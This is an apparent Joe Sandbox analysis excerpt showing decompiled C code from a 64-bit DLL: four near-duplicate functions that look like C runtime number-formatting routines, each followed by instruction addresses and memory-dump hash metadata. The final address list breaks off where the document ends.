                                                                      			E0000000118001E734(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001e81b;
                                                                      				if (_t110 == 0) goto 0x8001e784;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001e86f;
                                                                      				if (_t111 == 0) goto 0x8001e7f3;
                                                                      				if (_t111 == 0) goto 0x8001e7cc;
                                                                      				if (_t111 == 0) goto 0x8001e86f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001e83b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e7b6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e7b6;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e89a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e8b1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e7ed;
                                                                      				goto 0x8001e79f;
                                                                      				goto 0x8001e79f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001e815;
                                                                      				goto 0x8001e79f;
                                                                      				goto 0x8001e79f;
                                                                      				if (_t118 == 0) goto 0x8001e784;
                                                                      				if (_t118 == 0) goto 0x8001e784;
                                                                      				if (_t118 == 0) goto 0x8001e784;
                                                                      				goto 0x8001e772;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001e904;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e892;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001e79f;
                                                                      				goto 0x8001e79f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001e8ba;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001e8d4;
                                                                      				E00000001180022058(_t133, _t149);
                                                                      				goto 0x8001e8db;
                                                                      				E00000001180020A98( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001e902;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001e8f4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001e902;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001e734
                                                                      0x18001e739
                                                                      0x18001e73e
                                                                      0x18001e748
                                                                      0x18001e74b
                                                                      0x18001e74e
                                                                      0x18001e751
                                                                      0x18001e754
                                                                      0x18001e75a
                                                                      0x18001e75c
                                                                      0x18001e75e
                                                                      0x18001e767
                                                                      0x18001e770
                                                                      0x18001e775
                                                                      0x18001e77e
                                                                      0x18001e784
                                                                      0x18001e78c
                                                                      0x18001e7a6
                                                                      0x18001e7ab
                                                                      0x18001e7b3
                                                                      0x18001e7ba
                                                                      0x18001e7c0
                                                                      0x18001e7c7
                                                                      0x18001e7d4
                                                                      0x18001e7e4
                                                                      0x18001e7eb
                                                                      0x18001e7f1
                                                                      0x18001e7fb
                                                                      0x18001e805
                                                                      0x18001e80c
                                                                      0x18001e813
                                                                      0x18001e819
                                                                      0x18001e81e
                                                                      0x18001e827
                                                                      0x18001e830
                                                                      0x18001e836
                                                                      0x18001e83b
                                                                      0x18001e83f
                                                                      0x18001e842
                                                                      0x18001e849
                                                                      0x18001e84d
                                                                      0x18001e858
                                                                      0x18001e85d
                                                                      0x18001e863
                                                                      0x18001e86a
                                                                      0x18001e877
                                                                      0x18001e887
                                                                      0x18001e889
                                                                      0x18001e88d
                                                                      0x18001e895
                                                                      0x18001e8a5
                                                                      0x18001e8ac
                                                                      0x18001e8b4
                                                                      0x18001e8b6
                                                                      0x18001e8ba
                                                                      0x18001e8be
                                                                      0x18001e8c8
                                                                      0x18001e8cd
                                                                      0x18001e8d2
                                                                      0x18001e8d6
                                                                      0x18001e8e3
                                                                      0x18001e8e9
                                                                      0x18001e8f2
                                                                      0x18001e8f4
                                                                      0x18001e8fc
                                                                      0x18001e8ff
                                                                      0x18001e918

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e72771759df44cc1c3419b88e392e140b40115a0bf8839d804134319db1bd52
                                                                      • Instruction ID: 9907fe1db86dcda68504efcd85aabde250cf6ac038f929e21fb2c8a6a502d726
                                                                      • Opcode Fuzzy Hash: 6e72771759df44cc1c3419b88e392e140b40115a0bf8839d804134319db1bd52
                                                                      • Instruction Fuzzy Hash: 8F51A477604A9882F7AE8F28C0543BC27A1E75ABA8F148116EF49177D9CF21CE89C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001E91C(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001ea03;
                                                                      				if (_t110 == 0) goto 0x8001e96c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001ea57;
                                                                      				if (_t111 == 0) goto 0x8001e9db;
                                                                      				if (_t111 == 0) goto 0x8001e9b4;
                                                                      				if (_t111 == 0) goto 0x8001ea57;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001ea23;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e99e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e99e;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ea82;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001ea99;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e9d5;
                                                                      				goto 0x8001e987;
                                                                      				goto 0x8001e987;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001e9fd;
                                                                      				goto 0x8001e987;
                                                                      				goto 0x8001e987;
                                                                      				if (_t118 == 0) goto 0x8001e96c;
                                                                      				if (_t118 == 0) goto 0x8001e96c;
                                                                      				if (_t118 == 0) goto 0x8001e96c;
                                                                      				goto 0x8001e95a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001eaec;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001ea7a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001e987;
                                                                      				goto 0x8001e987;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001eaa2;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001eabc;
                                                                      				E000000011800220E4(_t133, _t149);
                                                                      				goto 0x8001eac3;
                                                                      				E00000001180020B24( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001eaea;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001eadc;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001eaea;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001e91c
                                                                      0x18001e921
                                                                      0x18001e926
                                                                      0x18001e930
                                                                      0x18001e933
                                                                      0x18001e936
                                                                      0x18001e939
                                                                      0x18001e93c
                                                                      0x18001e942
                                                                      0x18001e944
                                                                      0x18001e946
                                                                      0x18001e94f
                                                                      0x18001e958
                                                                      0x18001e95d
                                                                      0x18001e966
                                                                      0x18001e96c
                                                                      0x18001e974
                                                                      0x18001e98e
                                                                      0x18001e993
                                                                      0x18001e99b
                                                                      0x18001e9a2
                                                                      0x18001e9a8
                                                                      0x18001e9af
                                                                      0x18001e9bc
                                                                      0x18001e9cc
                                                                      0x18001e9d3
                                                                      0x18001e9d9
                                                                      0x18001e9e3
                                                                      0x18001e9ed
                                                                      0x18001e9f4
                                                                      0x18001e9fb
                                                                      0x18001ea01
                                                                      0x18001ea06
                                                                      0x18001ea0f
                                                                      0x18001ea18
                                                                      0x18001ea1e
                                                                      0x18001ea23
                                                                      0x18001ea27
                                                                      0x18001ea2a
                                                                      0x18001ea31
                                                                      0x18001ea35
                                                                      0x18001ea40
                                                                      0x18001ea45
                                                                      0x18001ea4b
                                                                      0x18001ea52
                                                                      0x18001ea5f
                                                                      0x18001ea6f
                                                                      0x18001ea71
                                                                      0x18001ea75
                                                                      0x18001ea7d
                                                                      0x18001ea8d
                                                                      0x18001ea94
                                                                      0x18001ea9c
                                                                      0x18001ea9e
                                                                      0x18001eaa2
                                                                      0x18001eaa6
                                                                      0x18001eab0
                                                                      0x18001eab5
                                                                      0x18001eaba
                                                                      0x18001eabe
                                                                      0x18001eacb
                                                                      0x18001ead1
                                                                      0x18001eada
                                                                      0x18001eadc
                                                                      0x18001eae4
                                                                      0x18001eae7
                                                                      0x18001eb00

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2840d7ca494f3b6dc15fd42c81a430b17a2a649747a226ca5bd2571ad86daad
                                                                      • Instruction ID: 3589b0eebfc9bfa735f082303aa6fc6177a616d2cbeb2c6ce66e7a2b85e7c830
                                                                      • Opcode Fuzzy Hash: c2840d7ca494f3b6dc15fd42c81a430b17a2a649747a226ca5bd2571ad86daad
                                                                      • Instruction Fuzzy Hash: 7E51B173604A9882E7EE8F28C0543AC77A0F75AB98F15811AEF4517799CF21DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001CB18(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001cbff;
                                                                      				if (_t110 == 0) goto 0x8001cb68;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001cc53;
                                                                      				if (_t111 == 0) goto 0x8001cbd7;
                                                                      				if (_t111 == 0) goto 0x8001cbb0;
                                                                      				if (_t111 == 0) goto 0x8001cc53;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001cc1f;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001cb9a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001cb9a;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001cc7e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001cc95;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cbd1;
                                                                      				goto 0x8001cb83;
                                                                      				goto 0x8001cb83;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001cbf9;
                                                                      				goto 0x8001cb83;
                                                                      				goto 0x8001cb83;
                                                                      				if (_t118 == 0) goto 0x8001cb68;
                                                                      				if (_t118 == 0) goto 0x8001cb68;
                                                                      				if (_t118 == 0) goto 0x8001cb68;
                                                                      				goto 0x8001cb56;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001cce8;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001cc76;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001cb83;
                                                                      				goto 0x8001cb83;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001cc9e;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001ccb8;
                                                                      				E000000011800216B8(_t133, _t149);
                                                                      				goto 0x8001ccbf;
                                                                      				E00000001180020140( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001cce6;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001ccd8;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001cce6;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001cb18
                                                                      0x18001cb1d
                                                                      0x18001cb22
                                                                      0x18001cb2c
                                                                      0x18001cb2f
                                                                      0x18001cb32
                                                                      0x18001cb35
                                                                      0x18001cb38
                                                                      0x18001cb3e
                                                                      0x18001cb40
                                                                      0x18001cb42
                                                                      0x18001cb4b
                                                                      0x18001cb54
                                                                      0x18001cb59
                                                                      0x18001cb62
                                                                      0x18001cb68
                                                                      0x18001cb70
                                                                      0x18001cb8a
                                                                      0x18001cb8f
                                                                      0x18001cb97
                                                                      0x18001cb9e
                                                                      0x18001cba4
                                                                      0x18001cbab
                                                                      0x18001cbb8
                                                                      0x18001cbc8
                                                                      0x18001cbcf
                                                                      0x18001cbd5
                                                                      0x18001cbdf
                                                                      0x18001cbe9
                                                                      0x18001cbf0
                                                                      0x18001cbf7
                                                                      0x18001cbfd
                                                                      0x18001cc02
                                                                      0x18001cc0b
                                                                      0x18001cc14
                                                                      0x18001cc1a
                                                                      0x18001cc1f
                                                                      0x18001cc23
                                                                      0x18001cc26
                                                                      0x18001cc2d
                                                                      0x18001cc31
                                                                      0x18001cc3c
                                                                      0x18001cc41
                                                                      0x18001cc47
                                                                      0x18001cc4e
                                                                      0x18001cc5b
                                                                      0x18001cc6b
                                                                      0x18001cc6d
                                                                      0x18001cc71
                                                                      0x18001cc79
                                                                      0x18001cc89
                                                                      0x18001cc90
                                                                      0x18001cc98
                                                                      0x18001cc9a
                                                                      0x18001cc9e
                                                                      0x18001cca2
                                                                      0x18001ccac
                                                                      0x18001ccb1
                                                                      0x18001ccb6
                                                                      0x18001ccba
                                                                      0x18001ccc7
                                                                      0x18001cccd
                                                                      0x18001ccd6
                                                                      0x18001ccd8
                                                                      0x18001cce0
                                                                      0x18001cce3
                                                                      0x18001ccfc

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22c7844e140ff258f1473e52899db42f9fcb0ede445d1f1526c07c29eaab338e
                                                                      • Instruction ID: de41ab6eebb4cd2ff852e777581ac3486d46ac1ab37e2f80d0d2e20233902fb5
                                                                      • Opcode Fuzzy Hash: 22c7844e140ff258f1473e52899db42f9fcb0ede445d1f1526c07c29eaab338e
                                                                      • Instruction Fuzzy Hash: 4A51D573608A1882E7AA8F28C1957AC37A0E359FE8F148119EF4957798CF31DE45C7C9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001ED30(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001ee17;
                                                                      				if (_t110 == 0) goto 0x8001ed80;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001ee6b;
                                                                      				if (_t111 == 0) goto 0x8001edef;
                                                                      				if (_t111 == 0) goto 0x8001edc8;
                                                                      				if (_t111 == 0) goto 0x8001ee6b;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001ee37;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001edb2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001edb2;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001ee96;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001eead;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ede9;
                                                                      				goto 0x8001ed9b;
                                                                      				goto 0x8001ed9b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001ee11;
                                                                      				goto 0x8001ed9b;
                                                                      				goto 0x8001ed9b;
                                                                      				if (_t118 == 0) goto 0x8001ed80;
                                                                      				if (_t118 == 0) goto 0x8001ed80;
                                                                      				if (_t118 == 0) goto 0x8001ed80;
                                                                      				goto 0x8001ed6e;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001ef00;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001ee8e;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001ed9b;
                                                                      				goto 0x8001ed9b;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001eeb6;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001eed0;
                                                                      				E000000011800221FC(_t133, _t149);
                                                                      				goto 0x8001eed7;
                                                                      				E00000001180020C3C( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001eefe;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001eef0;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001eefe;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001ed30
                                                                      0x18001ed35
                                                                      0x18001ed3a
                                                                      0x18001ed44
                                                                      0x18001ed47
                                                                      0x18001ed4a
                                                                      0x18001ed4d
                                                                      0x18001ed50
                                                                      0x18001ed56
                                                                      0x18001ed58
                                                                      0x18001ed5a
                                                                      0x18001ed63
                                                                      0x18001ed6c
                                                                      0x18001ed71
